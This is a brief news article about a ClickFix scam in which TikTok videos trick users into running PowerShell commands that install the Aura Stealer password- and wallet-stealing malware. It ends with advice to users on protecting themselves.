Home / Technology / TikTok Users Lured by Fake Activation Guides Delivering Malware
TikTok Users Lured by Fake Activation Guides Delivering Malware
16 Nov
Summary
- Cybercriminals disguise malware as free software activation guides on TikTok
- Malware known as Aura Stealer steals passwords, cookies, crypto wallets, and tokens
- Scam uses ClickFix attack to trick users into running malicious PowerShell commands
As of November 16th, 2025, cybercriminals have been actively targeting TikTok users with a new scam involving malicious software disguised as free activation guides. Security experts have confirmed that this campaign, first spotted earlier this year, is still ongoing.
The scammers are creating TikTok videos that show short PowerShell commands and instruct viewers to run them as administrators to "activate" or "fix" popular software like Windows, Microsoft 365, Photoshop, Netflix, and Spotify Premium. However, these commands are designed to connect to a malicious website and download a malware known as Aura Stealer.
Once installed, Aura Stealer quietly siphons saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim's computer. Additionally, the scam includes another file, source.exe, which uses Microsoft's C# compiler to launch code directly in memory, making it even harder to detect.
Experts warn that this type of "ClickFix" attack is a social engineering trick that makes victims feel they are following legitimate tech instructions. The instructions seem quick and simple, but instead of activating anything, the PowerShell command downloads harmful executables.
To avoid becoming a victim, users are advised to never copy or run PowerShell commands from TikTok videos or random websites, and to always download or activate software directly from official sources. Keeping antivirus software up-to-date and using strong passwords are also crucial steps to protect against such scams.
